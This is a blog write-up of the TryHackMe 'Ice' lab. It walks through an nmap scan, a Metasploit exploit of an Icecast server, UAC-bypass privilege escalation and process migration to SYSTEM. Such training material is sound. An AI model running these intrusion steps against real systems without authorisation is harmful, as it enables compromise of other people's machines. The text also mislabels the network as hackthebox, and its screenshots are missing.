TryHackMe – Ice Writeup

clock-img 17 Feb, 2022 
cat-img TryHackMe Writeups

TryHackMe – Ice Writeup

Ice Writeup

Connecting to HTB Vpn:

1] First download the vpn file from the access page of tryhackme

2] Open the .ovpn file in your terminal with the following command

openvpn yourname.ovpn

3] Now as the “Initialization Completed” message appears on the screen you are connected to the hackthebox network

4] You can access the machine at the given ip


1] First let’s do a nmap scan on our target at

nmap -sV -A -p-

-sV : to get the service versions on each port
-A : to get information such as os details, traceroutes, ports etc
-p- : to scan all 65535 ports

We get the following details from our scan


2] We can see an open port running icecast streaming media server, so first let’s search for any exploits related to this service using searchsploit

searchsploit icecast

TryHackMe – Ice Writeup

Gaining Access:

3] Since there is a metasploit module, first let’s try that


search icecast

TryHackMe – Ice Writeup : Gaining Access

4] Let’s try this exploit

use 0
set rhosts

Certified Ethical Hacking

Privilege Escalation:

5] Now lets background this session(ctrl+z) and try to escalate our privileges using the local exploit suggester module in metasploit

search local_exploit_suggester

use 0
set session 2

6] Let’s try the first exploit and if it doesn’t work then the rest

use exploit/windows/local/bypassuac_eventvwr
set session 2
set lhost

7] Now let’s check what all privileges this user has


8] We have SeTakeOwnership privilege, so let’s migrate to any process running as System

migrate 816

9] Now we are System on the machine


Training Calender